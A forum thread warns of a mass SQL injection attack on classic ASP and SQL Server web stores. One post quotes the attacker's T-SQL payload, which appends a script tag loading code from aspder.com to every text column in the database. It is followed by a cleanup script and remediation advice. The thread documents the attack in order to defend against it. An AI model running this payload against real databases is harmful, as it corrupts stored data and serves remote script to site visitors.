#1
WARNING - SQL injection attack going around
This morning I found one of our company web stores is lagging. Turns out it's because there are all these <script> links leading to aspder.com, pointing at a file called "1.js", and that site is currently down.
Looks like we got hacked. I did a Google search for aspder.com and TONS of other stores have that script tag inserted into their product data. Anyone know anything about this? Is this a vulnerability in our store software or is it a vulnerability in Microsoft's stuff somehow? (Win2003 Server, SQL Server 2005, IIS 6, ASP classic). Any info would be appreciated!
#2
Yep, sure enough:
malwaredomains.com/?p=156
#3
Here's a link to another forum with more info:
http://www.webhostingtalk.com/showthread.php?t=686032 It is an SQL injection attack targeted at SQL Server and ASP, but you'd have to leave your site pretty open to be vulnerable. Page 2 of that link shows the actual SQL executed: Code:
DECLARE @T varchar(255),@C varchar(255)
-- Pair every user table (xtype='u') with each of its text-like columns:
-- xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
-- Append the script tag to every row of every such column. Note that convert(varchar,...)
-- with no length defaults to 30 characters, so longer values are also truncated.
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.aspder.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
As to the question: I'd put the blame more on the store stuff. The programmers should know better than to send unfiltered input to a database.
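The payload above walks every text-like column and appends the tag, so cleanup has to walk the same columns and strip it. The T-SQL below is an added example, not code from the thread or from any store product: it reports how many rows in each text/ntext/varchar/nvarchar column contain the marker, and, when @fix is set to 1, removes it in place. It assumes SQL Server 2005 (catalog views, nvarchar(max)) and that the injected string is exactly the tag shown in the payload; the @marker, @fix and #hits names are the example's own.

```sql
SET NOCOUNT ON;

-- Marker to look for: the exact tag the thread's payload appends. Assumption: the
-- injected string is verbatim this; inspect a hit row first and adjust if a variant was used.
DECLARE @marker nvarchar(200);
SET @marker = N'<script src=http://www.aspder.com/1.js></script>';

DECLARE @fix bit;
SET @fix = 0;   -- 0 = report only; set to 1 to strip the marker from the data

DECLARE @schema sysname, @table sysname, @col sysname, @sql nvarchar(max);

IF OBJECT_ID('tempdb..#hits') IS NOT NULL DROP TABLE #hits;
CREATE TABLE #hits (schema_name sysname, table_name sysname, column_name sysname, rows_hit int);

-- Walk the same kinds of columns the payload walks (text/ntext/varchar/nvarchar), but
-- through the catalog views and with schema names, so the generated SQL is quoted safely.
DECLARE col_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT s.name, t.name, c.name
    FROM sys.tables t
    JOIN sys.schemas s ON s.schema_id = t.schema_id
    JOIN sys.columns c ON c.object_id = t.object_id
    JOIN sys.types   ty ON ty.user_type_id = c.user_type_id
    WHERE ty.name IN ('text', 'ntext', 'varchar', 'nvarchar')
      AND t.is_ms_shipped = 0;

OPEN col_cur;
FETCH NEXT FROM col_cur INTO @schema, @table, @col;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Count affected rows. The column is cast to nvarchar(max) because CHARINDEX and
    -- REPLACE do not accept text/ntext directly; the marker is passed as a parameter.
    SET @sql = N'INSERT INTO #hits SELECT @s, @t, @c, COUNT(*) FROM '
             + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE CHARINDEX(@m, CAST(' + QUOTENAME(@col) + N' AS nvarchar(max))) > 0;';
    EXEC sp_executesql @sql,
         N'@s sysname, @t sysname, @c sysname, @m nvarchar(200)',
         @s = @schema, @t = @table, @c = @col, @m = @marker;

    IF @fix = 1
    BEGIN
        -- Strip every occurrence of the marker and assign the cleaned value back.
        SET @sql = N'UPDATE ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
                 + N' SET ' + QUOTENAME(@col) + N' = REPLACE(CAST(' + QUOTENAME(@col)
                 + N' AS nvarchar(max)), @m, N'''')'
                 + N' WHERE CHARINDEX(@m, CAST(' + QUOTENAME(@col) + N' AS nvarchar(max))) > 0;';
        EXEC sp_executesql @sql, N'@m nvarchar(200)', @m = @marker;
    END

    FETCH NEXT FROM col_cur INTO @schema, @table, @col;
END
CLOSE col_cur;
DEALLOCATE col_cur;

-- Report: only columns that actually carry the marker.
SELECT * FROM #hits WHERE rows_hit > 0 ORDER BY schema_name, table_name, column_name;
```

Run it in report mode first, against a backup copy if possible. Two caveats: the payload's convert(varchar, ...) truncated every value it touched to 30 characters, and REPLACE cannot bring that data back, so restoring the affected columns from a pre-attack backup is the only full recovery; and cleaning the data without fixing the application (parameterised queries, e.g. ADODB.Command with parameters in classic ASP, instead of string concatenation) just invites reinfection. To catch variants that point at a different host, swap the CHARINDEX test for a PATINDEX wildcard such as '%<script src=http://%.js></script>%'.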
#4
Thanks for the response.
And to sizablegrin: thanks for the completely useless comment that contributes absolutely nothing to the discussion.
#5
Quote:
It also seems like his attack might have worked too well. The main reason people seem to be noticing is that things are starting to lag. Whoever wrote this seems to be DDoS-ing themselves out of business. -MBirchmeier
#6
I wonder what www.aspder.com's page rank will be after this? The attack is certainly finding no shortage of poorly coded sites to create the links; most of them are legitimate and a few will have a decent page rank of their own.
#8
Obligatory plug for xkcd.com, from the /. art
#9
Professionals must protect against SQL injection. And they need to keep up with the security press. This is not new, it's just the current one.
It's an arms race. Get used to it. Someone will do a better job about 'eternal vigilance' as a necessity.